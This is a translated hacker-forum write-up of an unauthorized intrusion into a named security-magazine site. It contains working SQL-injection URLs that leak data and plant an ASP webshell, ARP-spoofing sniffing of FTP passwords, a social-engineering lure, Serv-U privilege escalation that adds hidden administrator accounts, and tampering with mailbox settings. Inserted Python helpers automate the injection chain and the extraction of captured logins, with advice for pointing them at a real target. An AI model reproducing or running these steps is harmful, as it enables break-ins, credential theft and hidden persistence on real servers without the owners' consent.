Reposting this is fine by me, but if you go a little too far, sell someone else's manuscript for money and dress yourself up in someone else's technique, I have to remind you that your superiority rests on other people's contributions.
1. Scanned the target and found FTP on ..... no common vulnerabilities ..... so decided on ARP spoofing to sniff the traffic.
2. Find a host to sniff from:
C:\> ping hacker.com.cn
Pinging hacker.com.cn [211.157.102.239] with 32 bytes of data:
Scanned 211.157.102.1-211.157.102.255 for ports 80 and 1433, found a site in a default directory, and found an injection point.
http://xx.xx.xx.xx/111.asp?Id=3400 and 1=(select is_srvrolemember('sysadmin'))
Not sysadmin. Next, pull a database name out of master..sysdatabases; comparing the varchar name with the integer 1 makes SQL Server raise a conversion error that leaks the value in the error page:
http://xx.xx.xx.xx/111.asp?Id=3400 and 1=(select name from master.dbo.sysdatabases where dbid=7)
This gives the database name, ku1.
Now find a way to get a shell (Night brother and Smelly Rice brother supplied the information here; if you don't follow, look it up online):
http://xx.xx.xx.xx/111.asp?Id=3400;create table [dbo].[Xiaolu] ([Xiaoxue] [char](255));--
http://xx.xx.xx.xx/111.asp?Id=3400;declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into Xiaolu (Xiaoxue) values (@result);--
http://xx.xx.xx.xx/111.asp?Id=3400 and (select top 1 Xiaoxue from Xiaolu)=1
The resulting error shows the web root, D:\xxxx:
http://xx.xx.xx.xx/111.asp?Id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?Id=3400;create table cmd (STR image);--
http://xx.xx.xx.xx/111.asp?Id=3400;insert into cmd (STR) values ('<% if request("A")<>"" then execute request("A") %>');--
http://xx.xx.xx.xx/111.asp?Id=3400;backup database ku1 to disk='D:\xxxx\L.asp';--
The backup file lands in the web root with an .asp name, and IIS executes the ASP block embedded in it. (For how to use this shell, see the animation of the smallest ASP backdoor at http://666w.cn/down/view.asp?id=754.)
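The chain above is done by hand, one URL at a time. The following is an added example (not code from the write-up) that wraps the same error-based technique in reusable form: it builds the injected URLs, pulls the leaked varchar out of SQL Server's conversion-error message, strips the IIS virtual-root value down to a path, and generates the stacked statements that write the shell. The target URL, parameter name and table/column names follow the write-up's placeholders; `mock_oracle()` is a constructed stand-in for the vulnerable ASP page so the code runs offline, and the `MOCK_*` data is invented.

```python
"""Helpers for the error-based MSSQL injection chain shown above.

Added example, not code from the original write-up.  The target URL,
parameter name and table/column names follow the write-up's placeholders;
mock_oracle() is a constructed stand-in for the vulnerable ASP page so the
code runs offline.
"""
import re
from typing import Callable, List, Optional
from urllib.parse import quote, unquote, urlsplit

BASE_URL = "http://xx.xx.xx.xx/111.asp"   # placeholder target from the write-up
PARAM = "Id"
GOOD_ID = 3400                            # an id that returns a normal page

# SQL Server 2000 ("Syntax error converting the varchar value 'x' to a column
# of data type int") and 2005+ ("Conversion failed when converting the varchar
# value 'x' to data type int") both quote the offending value.
_LEAK_RE = re.compile(
    r"converting the (?:n?varchar|n?char) value '(.*?)' to (?:a column of )?data type int",
    re.I | re.S,
)


def inject_url(suffix: str) -> str:
    """Append an injected SQL fragment to the numeric Id parameter."""
    return f"{BASE_URL}?{PARAM}={GOOD_ID}{quote(' ' + suffix, safe='')}"


def leaked_value(body: str) -> Optional[str]:
    """Pull the varchar value out of a conversion-error page, if present."""
    m = _LEAK_RE.search(body)
    return m.group(1) if m else None


def extract(oracle: Callable[[str], str], select_expr: str) -> Optional[str]:
    """Leak one string: 'and 1=(select ...)' forces a varchar->int conversion."""
    return leaked_value(oracle(inject_url(f"and 1=({select_expr})")))


def boolean_check(oracle: Callable[[str], str], int_expr: str) -> bool:
    """True if int_expr evaluates to 1 (page matches the 'and 1=1' baseline)."""
    baseline = oracle(inject_url("and 1=1"))
    return oracle(inject_url(f"and 1=({int_expr})")) == baseline


def webroot_from_virtual_root(value: str) -> str:
    """IIS 4/5 stores each virtual root as 'path,username,accessflags'."""
    return value.split(",", 1)[0]


def webshell_chain(dbname: str, webroot: str, shell: str = "L.asp",
                   table: str = "cmd", column: str = "STR") -> List[str]:
    """Stacked statements that write a one-line ASP shell via BACKUP DATABASE.

    The .bak is binary, but IIS still hands a file named *.asp to asp.dll,
    which executes the <% ... %> block it finds inside.  Needs db_owner (or
    backup rights) on dbname, not sysadmin.
    """
    asp = '<% if request("A")<>"" then execute request("A") %>'
    return [
        f"use {dbname}",
        f"create table {table} ({column} image)",
        f"insert into {table} ({column}) values ('{asp}')",
        f"backup database {dbname} to disk='{webroot}\\{shell}'",
    ]


# ---- constructed mock of the vulnerable page (no real server involved) ----
MOCK_STRINGS = {
    "select name from master.dbo.sysdatabases where dbid=7": "ku1",
    "select top 1 Xiaoxue from Xiaolu": r"D:\xxxx,,201",
}
MOCK_INTS = {"select is_srvrolemember('sysadmin')": 0}   # not sysadmin, as above
NORMAL_PAGE = "<html>article 3400</html>"
EMPTY_PAGE = "<html>no such article</html>"


def mock_oracle(url: str) -> str:
    """Emulate how the injectable page would answer each request."""
    injected = unquote(urlsplit(url).query.split(f"{PARAM}=", 1)[1])
    m = re.search(r"and 1=\((.*)\)\s*$", injected, re.I | re.S)
    expr = m.group(1) if m else None
    if expr in MOCK_STRINGS:
        return ("Microsoft OLE DB Provider for SQL Server error '80040e07'<br>"
                "Syntax error converting the varchar value "
                f"'{MOCK_STRINGS[expr]}' to a column of data type int.")
    if expr in MOCK_INTS:
        return NORMAL_PAGE if MOCK_INTS[expr] == 1 else EMPTY_PAGE
    return NORMAL_PAGE


if __name__ == "__main__":
    print("sysadmin:", boolean_check(mock_oracle, "select is_srvrolemember('sysadmin')"))
    db = extract(mock_oracle, "select name from master.dbo.sysdatabases where dbid=7")
    root = webroot_from_virtual_root(extract(mock_oracle, "select top 1 Xiaoxue from Xiaolu"))
    for stmt in webshell_chain(db, root):
        print(inject_url(f";{stmt};--"))
```

Against a real target, replace `mock_oracle` with a function that fetches the URL and returns the response body; the leak regex only works while the page shows raw database errors, which is exactly what the `=1` comparison in the write-up relies on.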
Uploaded the ............ shell and got ready to escalate .......... Looked around and found pcAnywhere:
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\PCA.XXX.CIF
Cracked the password; the pcAnywhere connection looked like it would help me. Everything went smoothly, and the admin password was the same as the pcAnywhere password. :) tracert:
1 <10 ms <10 ms <10 ms 211.157.102.239
Hmm, one hop to Hacker Defense, so this box is on the same segment and ARP spoofing will work. (For ARP spoofing see the article I wrote at http://bbs.666w.cn/dispbbs.asp?boardid=7&id=764&page=1.)
Upload the needed software through the webshell:
winpcap.exe, arpsniffer.exe, pv.exe
arpsniffer.exe ------------ 57 K, Rongge's sniffing tool for switched networks
pv.exe ---------------- 60 K, the command-line program that comes with PrcView (the copy hosted on Huajun), used to kill processes
winpcap.exe ---------------- 678 K, the capture driver the sniffer needs
Install winpcap.exe: Next, Next, Next.
Create a hidden virtual directory (look up how yourself) and set its Application Protection to Low (in-process, so the code runs inside inetinfo.exe as LocalSystem), so that we can run the ARP program from the webshell without administrators easily noticing it.
3. Start sniffing:
OK, on we go ........ start the sniffer ........ given the state of Chinese network design and the quality of the people running it, this works nearly every time; run:
arpsniffer.exe 211.157.102.254 211.157.102.239 21 C:\111.txt 1
211.157.102.254 is the gateway, 211.157.102.239 is the Hacker Defense IP, 21 is the port to capture (FTP), C:\111.txt is the log file, and 1 is the NIC index. The tool spoofs ARP on both sides so the traffic between gateway and target passes through our host, where the clear-text FTP logins are written to the log.
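What the sniffer does with the redirected traffic is the simple part: FTP sends USER and PASS in clear text, and the server's 230 or 530 reply says whether the password was right. The following is an added example (not the arpsniffer.exe tool from the write-up) of that parsing step over a constructed capture; the server address is the write-up's target, the client address, user name and passwords are invented.

```python
"""Recover FTP logins from sniffed control-channel traffic.

Added example, not the arpsniffer.exe tool from the write-up.  It shows the
parsing step a sniffer performs once ARP spoofing has routed the
gateway<->target traffic through our host.  The capture below is
constructed; only the server IP comes from the write-up.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed capture, one TCP payload per line as "src>dst: text".
SAMPLE_CAPTURE = """\
211.157.102.239>10.0.0.5: 220 FTP server ready.
10.0.0.5>211.157.102.239: USER duck
211.157.102.239>10.0.0.5: 331 User name okay, need password.
10.0.0.5>211.157.102.239: PASS guess1
211.157.102.239>10.0.0.5: 530 Not logged in.
10.0.0.5>211.157.102.239: USER duck
211.157.102.239>10.0.0.5: 331 User name okay, need password.
10.0.0.5>211.157.102.239: PASS Qu4ck!Qu4ck
211.157.102.239>10.0.0.5: 230 User logged in, proceed.
10.0.0.5>211.157.102.239: PWD
"""

_LINE_RE = re.compile(r"^(\S+)>(\S+): (.*)$")


@dataclass
class FtpLogin:
    client: str
    server: str
    user: str
    password: str
    accepted: bool = False   # set once the server answers 230


def extract_ftp_logins(capture: str) -> List[FtpLogin]:
    """Pair each USER/PASS with the server's verdict, per client/server pair."""
    pending_user: Dict[Tuple[str, str], str] = {}        # (client, server) -> USER
    awaiting_reply: Dict[Tuple[str, str], FtpLogin] = {}
    logins: List[FtpLogin] = []
    for raw in capture.splitlines():
        m = _LINE_RE.match(raw.strip())
        if not m:
            continue
        src, dst, text = m.groups()
        parts = text.split(" ", 1)
        verb = parts[0].upper()
        arg = parts[1] if len(parts) > 1 else ""
        if verb == "USER":
            pending_user[(src, dst)] = arg
        elif verb == "PASS":
            login = FtpLogin(src, dst, pending_user.get((src, dst), ""), arg)
            logins.append(login)
            awaiting_reply[(src, dst)] = login
        elif text[:3].isdigit():
            code = text[:3]
            key = (dst, src)                 # replies flow server -> client
            login = awaiting_reply.get(key)
            if login is None:
                continue                     # banner, 331, etc.: nothing pending
            if code == "230":
                login.accepted = True
                awaiting_reply.pop(key)
            elif code[0] in "45":            # 530 bad password, 421 closed, ...
                awaiting_reply.pop(key)
    return logins


def successful_logins(capture: str) -> List[Tuple[str, str]]:
    """Only the (user, password) pairs the server actually accepted."""
    return [(l.user, l.password) for l in extract_ftp_logins(capture) if l.accepted]


if __name__ == "__main__":
    for login in extract_ftp_logins(SAMPLE_CAPTURE):
        print(login)
```

Keying on the (client, server) pair matters on a busy segment where several FTP sessions are interleaved in the same log; checking the 230 reply is what separates a real password from the failed guesses that also show up in clear text.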
What next? Wait, of course ....... but we don't want to wait for days; we want something quicker, so we tell Night brother to take action (), Exclusive is on QQ ():
Night:
"Hacker Defense has been hacked. I heard someone got in... go take a look..."
Exclusive:
OK, I'll go check.
The rest is omitted .....
Haha ...... the result goes without saying. A few minutes later the log file has grown noticeably. Because the arpsniffer process was started from the webshell we can't see it directly, so we kill it from the webshell too:
pv -k -f arpsniffer.exe
Kill the process, then read the password out of the log ~~~~~~
4. Get to work:
It's the FTP at http://978229.hacker.com.cn! Everything can be browsed, no security disk, ah, Duck, you used E:\wwwroot, haha.
Continue: fpipe -v -l 3041 -r 43958 127.0.0.1 (forward local port 3041 to 127.0.0.1:43958, Serv-U's local administration port, which only listens on loopback).
Add an FTP user through it, make it an administrator, log in and run (net1.exe is a copy of net.exe, used because net.exe is often blocked):
quote site exec net1 user Xiaolu Xiaoxue /add
quote site exec net1 localgroup administrators Xiaolu /add
3389 login, ah, no luck, continue:
quote site exec net1 user Xiaolu Xiaoxue@@!#!@#@!!##@123 /add
quote site exec net1 localgroup administrators Xiaolu /add
Haha, there was a password complexity policy as well, but I got in. I won't describe the next part; it would give the Hacker Defense editors a headache ........ (N content omitted here)
Let's look for some good stuff: there is a WebEasyMail server. Read the mail and the documents that make the editors' lives better. I don't know what the passwords look like, though.
Hey, follow me: D:\mail\. Each user's directory has a userweb.ini.
Open it and change
Questioninfo=1
Answerinfo=1
Hintinfo=1
Open hosts
Time to pull out; leave the rest to the editors.
5. Summary:
This intrusion took about an hour. Nothing advanced, just simple techniques: sniffing-based penetration is years old and SQL injection is a popular method, nothing new. That the FTP password came so quickly is thanks to Night's use of "social engineering".
The techniques themselves are valuable, but flexible use makes them more valuable.